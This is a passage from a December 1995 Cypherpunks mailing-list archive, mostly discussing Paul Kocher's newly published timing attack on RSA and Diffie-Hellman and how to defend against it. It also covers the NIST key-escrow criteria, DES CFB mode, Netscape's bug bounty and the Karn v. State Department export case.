>to be as sure of the timing as you can be.
>
>Now, on a distributed system, you can't measure those timings, because 
>any latency  could come from the originating computer, the links in the 
>middle or any combination of them.
...
>Am I missing something, or does this attack only work in a lab?

It works much better in relatively controlled environments -
smart cards, for example, are usually both slow and not busy doing 
other things, plus you can get a bunch of them and analyze the 
variance in performance across cards.  The Usual Suspects say this
does appear to affect Fortezza, plus things like digital wallets
are obvious targets.  If you're clever, you can design smart-card readers
that do the measurements for you, and convince people to use them.

The attack also works better if you can try it multiple times with the same 
numbers to work around random latency; the lowest number is closest to real.
Running on time-shared machines increases randomness a lot (though if the
Bad Guys have an account there, they can watch the machine's performance
more closely.)  On the other hand, running on shared machines has
its own set of security risks, though they're better places for Diffie-Hellman
systems than secret keys - but Diffie-Hellman needs authentication to be
safe against MITM, and therefore there's still a secret key for that.

Interesting times....  We've all been discussing whether there'd be some
major theoretical-mathematics breakthrough, and along comes an engineering
attack.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 12 Dec 1995 14:39:12 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <30CC0D31.293C@netscape.com>
Message-ID: <199512112125.QAA07753@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jeff Weinstein wrote:

| PS - I think Paul was a bit surprised when Jim Barksdale pulled
| out his wallet and handed him 10 crisp $100 bills.  :-)

Great.  mention it where the IRS is sure to be listening.  :)


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 12 Dec 1995 13:54:50 +0800
To: cypherpunks@toad.com
Subject: Voluntary Key Escrow is Freedom, Surveillance is Privacy
Message-ID: <acf1f957050210046c27@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Citizen-unit jim bell wrote:

>Pardon me, but since this "key escrow" system was always claimed to be
>"voluntary," then how can there be any kind of legal penalties associated
>with "failure to release" those keys?
>
>
>Which raises another question:  Let's suppose I owned a product based on
>CKE, and I went to the escrow agent and said, "This escrow is voluntary,
>right?  If so, erase my key in your possession."
>
>Not that I'd trust them to do so, but how "voluntary" can a system be if
>people can't volunteer out of it?

In much the same sense the income tax system is "voluntary."

For further details, consult the definition of "newspeak" in Orwell's novel.

Remember, saying that Voluntary Key Escrow is neither "voluntary" nor
"escrow" is thoughtcrime.


Freedom is Slavery, Surveillance is Privacy, Censorship is Decency


--Citizen-Unit May227-80-5992


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 12 Dec 1995 14:58:25 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <9512112128.AA06989@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> > People employing systems like PGP are already advised to use them
> > on private machines, with only one user, and untampered-with
> > binaries.
> 
> Timings like the ones listed are trivial to take in establishing
> things like SSL sessions, or Photuris sessions. The danger is to
> online protocols, not to PGP.
> Perry

Loathe as I am to disagree with Perry :-), is it really 'trivial' to take these 
timings in an online protocol? Paul writes on the DH example:

-------------------------
A preliminary implementation of the attack using the RSAREF toolkit[8] 
has been written. RSAREF scans across the exponent from MSB to
 LSB and does two exponent bits at a time, so corresponding 
adjustments to the attack were made. Using a 120-MHz PentiumTM 
computer running MSDOSTM, a 512-bit modulus, and a 256-bit secret 
exponent, processing times ranged from 392411 microseconds to 
393612 microseconds and closely approximated a normal distribution
with a mean of 393017 microseconds and a standard deviation of
188 microseconds.
--------------------------

Note that the range is 1201 microseconds

and for RSA:

--------------------------
RSAREF's modular reduction function with a 512-bit modulus on the 
same 120-MHz PentiumTM computer takes an average of 
approximately 17 microseconds less time if c is slightly smaller than 
p, as opposed to slightly larger than p. Timing measurements of 
many ciphertexts can be combined to detect whether the chosen 
ciphertexts are larger or smaller than p.
-------------------------
The range here is 17 microseconds.

Paul notes:
---------------------------
Random delays added to the processing time may increase the 
number of ciphertexts required, but do not completely solve the
problem since attackers can compensate for the delay by collecting 
more measurements. (If enough random noise is added, the attack 
can become infeasible.)
--------------------------

In a 'real' system, there is a lot of unpredictable variation
in the timing of the signal. Sources of such noise include
routers,  and other sessions on the server (any decent server these
days is multi-tasking, and can handle multiple connections 
simultaneously). On top of that, real protocols have a lot of
processing overhead, looking up certificates and keys, generating
MAC hash values, etc, many of which are difficult to predict.

I tried pinging some machines to look at the slop in the roundtrip
times. I have not checked traceroute, but for what it's worth,  I'm in 
central Massachusetts.

elnath (local to my lan)			<10 ms
rtfm.mit.edu (20 miles)			10-21 ms
iii1.iii.net (FreeBSD on a 120MHz P5, 35 miles)	100-200 ms
utopia.hacktic.nl (Netherlands)			190-781 ms

Maybe Paul can give us some figures as to how *much* random
noise is enough to make his (very elegant!) attack unfeasible. Note 
that the range of the random slop I'm getting is hundreds to thousands
of times the range of the signal he needs to detect. Statistical techniques, 
averaging the return times for the same text over many trials may be useful, 
but the number required to detect a less than 1% variation is going to be high.

The attack might be feasible of it can be mounted on a quiet server
from a point 'close' (in network terms) to the timing system, and the 
intervening network segments are also fairly quiet.  I don't think
random users are going to crack the Dilbert Store, however.

Speaking for myself....






Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Tue, 12 Dec 1995 13:05:05 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512111906.OAA01139@crypto.com>
Message-ID: <199512120056.QAA16055@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze writes:

> Of course, this works against a remote adversary, but not against one
> on the same machine who can look at actual CPU consumption (which doesn't
> increase when the target is blocked).

Maybe this is a good reason to spinwait, rather than sleep, until
the timer expires.  It would be pretty subtle to distinguish that
from "real" computation.

Peter Monta





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@GS160.SP.CS.CMU.EDU
Date: Tue, 12 Dec 1995 14:16:14 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Attacks
In-Reply-To: <+cmu.andrew.internet.cypherpunks+Qkn8QTu00UfAE0yrN:@andrew.cmu.edu>
Message-ID: <9512112205.AA07602@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


samman-ben@CS.YALE.EDU writes:
>I'm not so sure I see the great usefulness of this attack.

It appears to be more practical than 99 percent of the "weaknesses"
that get published.  Not bad, I'd say.  It's also a very cute attack;
I'd never have guessed a priori that you could get that many key bits
from timing data.

>work in a lab, with the current advances in computing speed, the 
>differences between a fast and a slow calculation can easily be opaqued 
>by network lag.

"Random delays added to the processing time may increase the number of
ciphertexts required, but do not completely solve the problem since
attackers can compensate for the delay by collecting more
measurements.  (If enough random noise is added, the attack can
become infeasible.)"  [extended abstract, p. 5]

Sufficient network noise *might* make the problem go away, in some
cases, but that's a weak sort of claim to make about a cryptosystem.
(What if the attacker tries at six in the morning, or cracks a machine
local to you, or just gets lucky?)  You might put your server behind a
time-quantizing firewall...

Also, it's not just networked machines.  Smart cards may have a hard
time defending themselves against hostile card readers.  They're slow
already; the user may not appreciate the extra time spent for
obfuscation.  (This depends critically on the numbers, of course.)

--
   Eli Brandt
   eli+@cs.cmu.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Tue, 12 Dec 1995 11:25:32 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512120100.UAA00263@jekyll.piermont.com>
Message-ID: <30CCD843.6231@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> Tom Weinstein writes:
>
> > The problem with that approach is that if the system is heavily
> > loaded, it can take an arbitrarily large amount of user time.
> 
> Totally untrue. The process can take an arbitrary amount of wall clock
> time, not user time.

Whoops.  You are absolutely correct.  Pardon my brain-damage.  I
was thinking wall clock time, as you indicated.

> > Somewhat better is to sleep for a random amount of time after you're
> > done.
> 
> I don't think so. First of all, you can still extract some
> information. If you have been gone as long as the maximum computation
> plus the maximum random fudge, you know that you had to have conducted
> the maximum computation. This means that some bits are indeed
> leaking. Your approach also has the disadvantage that it is hard to
> produce good random numbers -- you are perhaps familiar with that
> problem?

Yes, you are correct.  It's better than taking a fixed amount of wall
clock time, but definitely not better than a fixed amount of user
time.

As Paul mentions in his extended abstract, there is actually an easy way
to fix the problem without hurting either latency or throughput much. 
If you blind and and unblind around the modular exponentiation, it
appears impossible to perform this attack.  Because you don't know the
inputs to the exponentiation operation, you can't make any predictions
based on those inputs.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Tue, 12 Dec 1995 15:04:44 +0800
To: cypherpunks@toad.com
Subject: Re: NIST GAK meeting writeup, part 3 of 3
Message-ID: <62487.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I appologise to the list for the character mangling in the original posting.
I wrote it in Word so I could spellcheck it, and I couldn't turn OFF the
idiotic smartquotes.  I've placed a cleaned up, fewer typo, and hyperlinked
version out on my NIST page,
http://www.isse.gmu.edu/~pfarrell/nist/pdf.nist2.html


  jim bell <jimbell@pacifier.com>  writes:

>>  Geoff said that they may want legislation support for
>>  protecting against illegal release of keys, failure to release, etc.

> Pardon me, but since this "key escrow" system was always claimed to be
> "voluntary," then how can there be any kind of legal penalties associated
> with "failure to release" those keys?

It was Geoff G. talking, not Mike Nelson or Ed Appel. The difference
is critical. Mike and Ed have some political savvy. My best friend Geoff
does not. I believe that Geoff has never bought into "voluntary" as
a concept. EPIC successfully FOIA'd papers from the FBI saying that
they will change their tune when/if there isn't sufficient compliance.

Mike and Ed are political enough to know that they can't sell this if
they push too hard. Geoff isn't.

The podium had a light that showed green/yellow/red lights. These
let the speakers know how much time was left. For the morning, since only
NIST/NSA/FBI/... folks talked, they didn't bother to reset the light.
It was red all the time, altho it blinked occasionally.

Ed took the mike, and asked "what is the red light for? Does it glow
red whenever someone from the Government is lying?" It got a good chuckle.
It was probably also close to being true. Ed and Mike understand
the audience, Geoff never will.

> Which raises another question:  Let's suppose I owned a product based on
> CKE, and I went to the escrow agent and said, "This escrow is voluntary,
> right?  If so, erase my key in your possession."
>
> Not that I'd trust them to do so, but how "voluntary" can a system be if
> people can't volunteer out of it?

It isn't voluntary for export approved software. The word voluntary is
not in the criteria. It is only voluntary if domestic users foolishly
choose to buy GAK'd products. So don't!

Criteria #2 says "...cryptographic functions shall be inoperable until the
key(s) is escrowed in accordance with #3."

Worse, IMHO, is criteria #9, which states " ... cryptographic functions
shall interoperate only with key escrow cryptographic functions in products
that meet these criteria..."

The interoperability issues stayed muddy. The government didn't spend much
effort making it clearer. The karma seemed to be that if you had two
products, say Webscape 128 and Webscape 64/Gak, selling 128 domestically
and 64/GAK exported, that you can't make Webscape128 interoperate with
64/GAK unless the Webscape128 keys are GAKed.

Part of this is burried in agent criteria #6, "6. Escrow agent entities that
are certified by the U.S. government shall work with developers of key
escrow encryption products to develop and support a feature that allows the
product to verify to one another that the product's keys have been escrowed
with a U.S.-certified agent."

Looks to me like the software has to chase up the chain of certification
authorities (or escrow authorities if you prefer) before it can work.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 12 Dec 1995 14:06:28 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: DES Cryptanalysis
In-Reply-To: <30cc40ff3f57002@noc.cis.umn.edu>
Message-ID: <199512112328.SAA06771@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Kevin L. Prigge writes:
> I'm looking for pointers, or perhaps an explanation of the statement
> I found in Applied Cryptography (section 9.6) where it implies
> that if the IV is not unique in CFB mode, the cryptanalyst can recover the
> plaintext.
> 
> The reason that this interests me is that I have a file, encrypted
> with DES in CFB mode. I believe I know the first 8 bytes of plaintext
> and I also know the IV used. 

I don't believe you have much cause for hope here. The IV usually accompanies
the ciphertext in the clear. Knowing the first 8 bytes of plaintext gives you
precious little additional information in CFB mode, for the purposes of
decryption. (It looks like you might be able to reconstruct the ciphertext
of the encrypted IV, giving you a single plaintext/ciphertext pair, but that's
about it....)

Generally it's advisable to use a different IV for each encryption to avoid 
correlations between the ciphertexts for plaintexts that have the same 
prefix. If you always used the same IV, then two messages that start with the
same text would encrypt to the same initial piece of ciphertext. (This is not
the only reason, but I think it's the main one.)

-Futplex <futplex@pseudonym.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 12 Dec 1995 14:05:35 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: NIST GAK meeting writeup, LONG part 3 of 3
Message-ID: <9512120039.AA00574@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Pat Farrell writes in his report on thi NIST GAK meeting:
>>Geoff said that they may want legislation support for
>>protecting against illegal release of keys, failure to release, etc.

Jim Bell Responds:
>  Pardon me, but since this "key escrow" system was always claimed
>  to be "voluntary," then how can there be any kind of legal penalties
>  associated with "failure to release" those keys?

well, since the subject at hand is Escrow Agent Criteria, "Geoff" is probably  
talking about the failure of an escrow agent to release a key upon production  
of "lawful authorization" ....


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 11 Dec 1995 17:55:55 +0800
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl>
Message-ID: <Pine.SOL.3.91.951211192419.28608P-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995, Anonymous wrote:
> pck@netcom.com (Paul C. Kocher) writes:
> I just read this paper, and while it is somewhat interesting, I
> don't think the walls of cryptography are in any danger of
> crumbling.
...
> So while this is a very nice piece of work, and certainly of
> theoretical interest, I don't think it will modify the way in
> which people are advised to utilize cryptographic software, or
> cause companies like Netscape of RSADSI to shed any tears.

Read the SKIP spec (SKIP is Sun's IP level encryption protocol).  It uses
Diffle-Hellman certificates.  That means fixed secret DH keys being used
in routers.  It is hard to thing of a better target for this type of
attack.  I have not done a complete read of the SKIP specification (only a
quick scan) so I could be wrong about SKIP but DH certificates sound like
a very very bad idea.  The other source for attack would be any networked
service that is on a local network.  Single user machines are far better
targes than multi-user systems.  That Web server sitting idle not doing
much, repeatedly hit it with https requests and if you are on a local
network, you should be able to get very good timing information. 

I for one will probably add a flag for conditional compilation of my 
bignumber library so that it will take constant time.  This may be a %10 
slow down (using small windows exponentiation) which is trivial compared 
to the %30 speedup I will probably get when I implement a faster mod 
function :-).

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Dec 1995 14:55:20 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <30CC9B8C.6201@netscape.com>
Message-ID: <199512120100.UAA00263@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein writes:
> Perry E. Metzger wrote:
> > The trivial way to handle this is simply to check user time with the
> > right system calls and make sure it always comes out the same with an
> > apropriate number of sleeps.
> 
> The problem with that approach is that if the system is heavily loaded,
> it can take an arbitrarily large amount of user time.

Totally untrue. The process can take an arbitrary amount of wall clock
time, not user time.

In the case of the heavily loaded machine, the problem is gone -- the
opponent can't precisely predict this. Provided you take the same
amount of process time no matter what, you are okay.

(To be technical, user time doesn't pass during sleeps, but that
doesn't matter -- the problem gets fixed anyway).

> Somewhat better is to sleep for a random amount of time after you're
> done.

I don't think so. First of all, you can still extract some
information. If you have been gone as long as the maximum computation
plus the maximum random fudge, you know that you had to have conducted
the maximum computation. This means that some bits are indeed
leaking. Your approach also has the disadvantage that it is hard to
produce good random numbers -- you are perhaps familiar with that problem?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Dec 1995 12:53:35 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Timing Attacks
In-Reply-To: <199512120026.QAA19309@ix12.ix.netcom.com>
Message-ID: <199512120111.UAA00312@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart writes:
> The attack also works better if you can try it multiple times with the same 
> numbers to work around random latency; the lowest number is closest to real.

Other statistical techniques can be used to get around random network
latency. Anyone who's used NTP is aware of the possibilities...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 12 Dec 1995 15:22:58 +0800
To: daw@bamako.CS.Berkeley.EDU (David A Wagner)
Subject: Re: More FUD from First Virtual [NOISE]
In-Reply-To: <199512112215.RAA13271@bb.hks.net>
Message-ID: <199512120519.VAA09715@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Maybe Sameer will create a Hack FV page :-)

	FV isn't worth it.

	Actually, Hack FV seems pretty pointless. Someone hacks FV,
and a chargeback is issued on the credit card. Big deal. Same old
outdated credit-card based payment systems.
	No more secure than credit cards.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 12 Dec 1995 05:04:23 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <30CC02F5.4487@netscape.com>
Message-ID: <Pine.SOL.3.91.951211204336.28608R-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995, Tom Weinstein wrote:
> Careful.  Even if you can make the number of executed instructions the
> same, you still have to worry about timing differences due to branches
> and the way the hardware multiplier handles different operands.

Granted.  For my particular library, there are no major 'if statements' I 
believe (I'll check) after you get out of the mod_exp function and into 
the mod and mul sub parts.  As for the multiplier, I just had a look at 
my old 386 book and yup, it does take an argument dependent time... I've 
been around pipelined RISC cpus too long...

eric 
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 12 Dec 1995 16:32:51 +0800
To: cypherpunks@toad.com
Subject: Re: More FUD from First Virtual [NOISE]
Message-ID: <199512120654.WAA17948@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:19 PM 12/11/95 -0800, sameer wrote:
>> Maybe Sameer will create a Hack FV page :-)
>
>	FV isn't worth it.
>	Actually, Hack FV seems pretty pointless. Someone hacks FV,
>and a chargeback is issued on the credit card. Big deal. Same old
>outdated credit-card based payment systems.
>	No more secure than credit cards.

Besides, if you hack FV you've got the money :-)
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: OpsAn@gnn.com (Michael Coates)
Date: Tue, 12 Dec 1995 16:36:30 +0800
To: cypherpunks@toad.com
Subject: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
Message-ID: <199512120710.CAA07438@mail-e1b.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
Netscape Communications has awarded two software sleuths $1,000 each for
finding security gaps in its Netscape Navigator 2.0 software.  The company
also awarded gifts to 50 other contestants in its "Bugs Bounty" program for
identifying non-security problems.  (Wall Street Journal 11 Dec 95 B7)
Meanwhile, Netscape has vowed to wage a "dogfight" with Microsoft in setting
standards for Internet software.  CEO James Barksdale says his company will
continue to develop products that operate independently of any particular
computer operating system, noting that, "We offer freedom to the masses.
It's a tough fight -- I'll grant you that -- but we're brave.  We're well
financed.  We believe that God is on our side."  (Investor's Business Daily
11 Dec 95 A7)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 12 Dec 1995 16:52:15 +0800
To: gibo@ripco.com (Giles Bowkett)
Subject: Re: Timing Attack Paper
Message-ID: <199512120729.XAA21395@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:39 PM 12/11/95 CST, gibo wrote:
>I went to
>
>http://www.cryptography.com/timingattack.html
>
>and found the whole thing to be totally incomprehensible from
>a layman's point of view.  I apologize for having not read
>"Applied Cryptography", which might have made the abstract a
>simpler read - but even if I had I'd have been baffled by a
>lot of the terminology and equations in this paper.
>
>Can anyone post a brief summary which explains the essential
>workings of the attack?  I'd be very grateful.

Briefly, most public-key calculations are _slow_, and use
512-2048-bit numbers which get represented as arrays of
machine integers. The amount of time they take depends on the values
you're multiplying together, especially because the algorithms
used to do the arithmetic less slowly take shortcuts whenever
possible to avoid unnecessary work.  If you watch the time
that it takes for a machine to do calculations using its private
keys, for some algorithms you can guess a bit or two of the key.
If you're clever, and have the ability to feed the victim
different numbers for it to calculate on (e.g. make a bunch
of connections using Diffie-Hellman), you can guess different
bits each time, and gradually get the whole thing.

It helps to watch this a number of times to get better statistics,
so you can tell what's real calculation and what's just speed-randomness.
Obviously, it also helps if you're running a program on the same
machine as the target you're trying to hit, but you can still gain
some information if you're running across a network and having to
estimate random network delays.  In these cases, you just have to 
watch longer to get stats.

A common algorithm for doing modular exponentiation (the core
of the Diffie-Hellman and RSA algorithms) looks like this:

To calculate y**x mod m  (all this arithmetic is multiple-precision)
(and maybe there's an off-by-one error or two in this :-)
This uses successive squaring to do the calculation in log2(x) time
instead of just doing x multiplies by y, which would be very slow
since x is typically 500-1000 bits long...  Remember that
multiplying two 1024-bit numbers typically involves multiplying two
arrays of 32 numbers 32 bits long, which takes 32*32 or 1024 multiply steps.
And modulo calculations are also slow.
        prod = 1
        square = y
        log2x = number of bits in x
        for i = 1 to log2x+1  {
                if (x odd) then {
                        prod = prod * square
                        if ( prod > m ) then prod = prod mod m
                }
                # else if (x even), don't bother
                square = square * square
                if (square > m) square = square mod m
                x = x / 2
        }

You can figure out the timing for the squaring calculations yourself.
Since you get to pick y, you can manipulate it to guess a bit about
how long x is, and notice from the different timings how many
times there was a prod*square calculation (which tells you how many
bits were odd), as well as how many prod mod m calculations.

You can get a certain amount of defense by keeping around prod1 and prod2,
and calculating prod1 = prod1 * square (the real value) for odd
and prod2 = prod2 * square (a dummy you'll discard later) for even,
and doing something useful to obscure the mod m calculations,
like keeping a dummy around to divide if prod1 or prod2 is less than m.
Aside from slowing things down by 50%, if you're not careful, there's
still information that leaks from the timing.  

For other algorithms, sometimes the calculations you've got to do timings
on are more subtle, like DES, but you can still often guess things,
and Paul gives a bunch of calculations for these.  They're more statistical,
since the effects you're chasing are subtler, but you still get information.


#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Tue, 12 Dec 1995 15:19:07 +0800
To: "Martin Diehl" <mdiehl@dttus.com>
Subject: Re: Re[2]: Timing Cryptanalysis Attack
Message-ID: <199512120558.XAA02070@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 12/11/95 CST, Martin Diehl wrote:

>     OTOH, maybe we _should_ try for constant computation time and then try 
>     for *random* delay time.  Remember that _we_ will spend a lot of real 
>     time arguing whether the *random* delay is really _random_
Does it necessarily matter whether the random delay time is true-random?
The idea is to obfuscate the time of the whole computation.  As long
as you don't base your random numbers on the system clock, it should
serve its purpose.  (I omit the system clock because timing seems to be
the nexus of the whole attack, so we can safely assume that the clock's
data, and thus its source of "randomness," can be predicted.
----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Quote: "And if we change, well, I'll love you anyway" - Alice In Chains
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@unix.ka9q.ampr.org>
Date: Tue, 12 Dec 1995 18:23:46 +0800
To: cypherpunks@toad.com
Subject: Plaintiff's Opposition in Karn vs State Dept
Message-ID: <199512120910.BAA05272@unix.ka9q.ampr.org>
MIME-Version: 1.0
Content-Type: text/plain


On Monday, December 11, my attorneys filed a Plaintiff's Opposition to
Defendants' Motion to Dismiss in the case of Karn vs US Dept of State
et al.

I have HTMLized our filings and added them to my web page. Please feel
free to peruse them. Also, let me know if you spot any obvious typos;
I had to do quite a bit of manual editing, particularly in the
footnotes, to make the result look good in HTML.

The government now gets the chance to answer our opposition. They were
originally scheduled to do by December 13, but since our own filing
was delayed over the weekend by the judge's concurrence the government
will probably get a few extra days to respond.

Note that we have asked to make oral arguments on the motion. I'll let
everyone know if or when this will happen.

The web page is:

http://www.qualcomm.com/people/pkarn/export


Phil






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Tue, 12 Dec 1995 16:56:56 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Attacks
In-Reply-To: <9512112205.AA07602@toad.com>
Message-ID: <30cd30bd.1863868@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995 17:04:56 -0500 (EST), Eli Brandt wrote:

> Also, it's not just networked machines.  Smart cards may have a hard
> time defending themselves against hostile card readers.  They're slow
> already; the user may not appreciate the extra time spent for
> obfuscation.  (This depends critically on the numbers, of course.)

Smart card have one major advantage, though.  During these types of
operations, a smart card will be totally dedicated to the crypto.
Calculating the maximum possible delay for a given key size should be
relatively easy.

Most single-chip micros also have a timer that could be readily
dedicated to counting out this maximum possible delay, and the result
held only that long.  This could, on an 8051 (as a fairly typical
example) be easily controlled (with a 1-instruction loop) to within 2
instruction cycles.  Given another dozen or so instructions, it can be
controlled to a single fixed delay.

Where minimum and maximum delays only differ by 1% or so for a given
key size, no one will ever notice the extra time required to hold the
result for the maximum possible delay.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 13 Dec 1995 06:44:09 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: GAK and self-incrimination?
In-Reply-To: <199512102233.AA10816@ideath.goldenbear.com>
Message-ID: <199512110944.EAA14913@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles writes:
> But it seems to me that the real bottom line is that the information which
> is compelled is not incriminating, and the information which is
> incriminating is not compelled. The keys to my crypto might lead to
> incriminating evidence, or they might prove to be useful in a prosecution,
> but they're not in themselves any sort of a signal that a crime has been or
> will be committed.

Written half in jest: Well, the cries from the TLAs of "Why do you want to
use cryptography ?  What do you have to hide ?" notwithstanding....

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 13 Dec 1995 11:34:14 +0800
To: cypherpunks@toad.com
Subject: KOC_her
Message-ID: <199512111231.HAA02647@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-11-95. NYPaper Page One:


   John Markoff reports on Paul Kocher's paper on the timing
   attack vulnerability of public-key encryption. Quotes Matt
   Blaze, Bruce Scheiner, Ron Rivest, Martin Hellman, James
   Bidzos.

   KOC_her (11 kb)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 13 Dec 1995 05:54:04 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <0kn1kjCMc50e02ivZP@nsb.fv.com>
Message-ID: <199512111920.LAA24338@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Nathaniel Borenstein <nsb@nsb.fv.com> writes:
> Hey, don't go for constant time, that's too hard to get perfect.  Add a
